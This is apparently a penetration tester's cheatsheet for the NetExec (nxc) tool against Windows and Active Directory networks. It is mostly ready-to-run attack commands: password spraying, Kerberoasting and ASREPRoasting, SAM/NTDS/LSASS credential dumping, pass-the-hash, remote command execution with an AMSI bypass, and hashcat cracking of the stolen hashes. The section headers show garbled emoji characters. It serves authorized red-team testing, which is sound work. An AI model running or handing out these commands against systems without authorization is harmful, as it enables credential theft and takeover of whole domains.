π‘οΈ Methodology Checklist
π― Operational Context
Use when: Quick nxc command reference β match protocol, action, and flag to the current task.
Think Dumber First: Syntax: nxc [PROTOCOL] [TARGET] -u [USER] -p [PASS] [ACTION]. Protocol: smb/ldap/winrm/rdp/mssql. Always test connectivity before running modules: nxc smb [TARGET] -u [USER] -p [PASS] β Pwn3d! = local admin = all SMB operations available.
Skip when: N/A β reference document.
β‘ Tactical Cheatsheet
Command Tactical Outcome nxc smb [NETWORK]/[MASK]Subnet sweep β OS, signing, domain nxc smb [NETWORK]/[MASK] --gen-relay-list relay.txtFind SMB signing=False hosts nxc smb [DC_IP] -u '' -p '' --pass-polPassword policy (check before spraying!) nxc smb [DC_IP] -u '' -p '' --usersUser enumeration via NULL session nxc smb [DC_IP] -u [USER_FILE] -p '[PASS]' --continue-on-successPassword spray nxc ldap [DC_FQDN] -u [USER] -p [PASS] --asreproast asrep.txtASREPRoast all eligible accounts nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb.txtKerberoast all SPN accounts nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_passwordGPP credential extraction nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M lapsLAPS password extraction nxc smb [TARGET_IP] -u [USER] -p [PASS] --samDump local SAM hashes nxc smb [DC_IP] -u [USER] -p [PASS] --ntdsDump NTDS.dit (all domain hashes) nxc smb [TARGET_IP] -u [USER] -p [PASS] --lsaLSA secrets + cached domain creds nxc smb [TARGET_IP] -u [USER] -p [PASS] -M lsassyLSASS dump nxc [PROTO] [TARGET_IP] -u [USER] -H [NTLM_HASH]Pass-the-Hash nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "[CMD]"Remote CMD execution nxc smb [TARGET_IP] -u [USER] -p [PASS] -X "[PS]"Remote PowerShell (AMSI bypassed)
π¬ Deep Dive & Workflow
Engagement Workflow β NetExec Phases
Phase 0: Setup
pipx install netexec
nxcdb β workspace create [ENGAGEMENT]
Phase 1: Recon
nxc smb [SUBNET]/24 β discover hosts, OS, signing
nxc smb [SUBNET]/24 --gen-relay-list relay.txt β find relay targets
Phase 2: Anonymous Enum
nxc smb [DC_IP] -u '' -p '' --pass-pol β FIRST: lockout threshold
nxc smb [DC_IP] -u '' -p '' --users β user list
nxc smb [DC_IP] -u '' -p '' --shares β accessible shares
Phase 3: Credential Attacks
nxc smb [DC_IP] -u users.txt -p 'Corp2024!' β spray (respect lockout)
nxc ldap [DC_FQDN] -u users.txt -p '' --asreproast β ASREPRoast
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password β GPP creds
Phase 4: Authenticated Enum
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting β Kerberoast
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M laps β LAPS passwords
nxc smb [TARGET] -u [USER] -p [PASS] -M spider_plus β file search
Phase 5: Post-Exploitation
nxc smb [TARGET] -u [USER] -p [PASS] --sam β local hashes
nxc smb [DC_IP] -u [ADMIN] -p [PASS] --ntds β domain hashes
nxc smb [TARGET] -u [USER] -p [PASS] -M lsassy β live creds
Phase 6: Lateral Movement
nxc smb [SUBNET]/24 -u [USER] -H [HASH] --local-auth β hash spray
nxc winrm [TARGET] -u [USER] -H [HASH] β WinRM
nxcdb β export creds detailed loot.csv β document all
Critical Rules
Rule Why Check --pass-pol before spraying Avoid domain lockout Use FQDN (not IP) for LDAP/Kerberos Kerberos requires hostname --local-auth for non-domain accountsOtherwise auth fails silently (Pwn3d!) required for -x, -X, dumpWithout it = access denied Add DC FQDN to /etc/hosts Required for Kerberos ticket ops Delete smb.db if NXC acts buggy Fixes corrupt database state
Hash Cracking Quick Reference
# ASREPRoast (hashcat mode 18200) hashcat -a 0 -m 18200 asrep.txt rockyou.txt
# Kerberoast (hashcat mode 13100) hashcat -a 0 -m 13100 kerb.txt rockyou.txt --force
# NTLM (hashcat mode 1000) β from SAM/NTDS hashcat -a 0 -m 1000 ntlm.txt rockyou.txt
# NetNTLMv2 (hashcat mode 5600) β from Responder hashcat -a 0 -m 5600 netntlmv2.txt rockyou.txt
# DCC2/mscache2 (hashcat mode 2100) β from LSA hashcat -a 0 -m 2100 dcc2.txt rockyou.txt Protocol Quick-Access
# SMB nxc smb [TARGET] -u [USER] -p [PASS]
# WinRM (PowerShell remoting) nxc winrm [TARGET] -u [USER] -p [PASS]
# RDP check nxc rdp [TARGET] --nla-screenshot
# LDAP (use FQDN) nxc ldap [DC_FQDN] -u [USER] -p [PASS]
# MSSQL nxc mssql [TARGET] -u [USER] -p [PASS] -d [DOMAIN] nxc mssql [TARGET] -u [USER] -p [PASS] --local-auth
# SSH nxc ssh [TARGET] -u [USER] -p [PASS] π οΈ Troubleshooting & Edge Cases
Problem Cause Fix Wrong protocol for target Protocol selection unclear Test multiple: smbβwinrmβrdpβssh; nxc shows whatβs accessible for each protocol Module not found Wrong module name List modules: nxc smb -L for SMB modules; nxc ldap -L for LDAP modules nxc vs crackmapexec confusion Legacy name nxc is the current tool; cme is the old name; same developer, same tool β use nxc Authentication fails Wrong format Domain accounts: -u DOMAIN\\user or --domain DOMAIN -u user; local: -u user --local-auth Module requires elevated access Not admin Some modules (βsam, βlsa) require local admin; verify Pwn3d! before running elevated modules
π Reporting Trigger
Finding Title: NetExec Multi-Protocol Attack Surface Coverage
Impact: nxc provides single-tool coverage across SMB, LDAP, WinRM, RDP, MSSQL, and SSH protocols, enabling rapid credential testing and post-exploitation across all Windows protocols with consistent syntax and built-in result tracking.
Root Cause: N/A β operational tool reference.
Recommendation: Security teams should run nxc against their own environments during red team exercises to identify credential reuse and misconfigured services before attackers do. nxc output provides actionable remediation targets.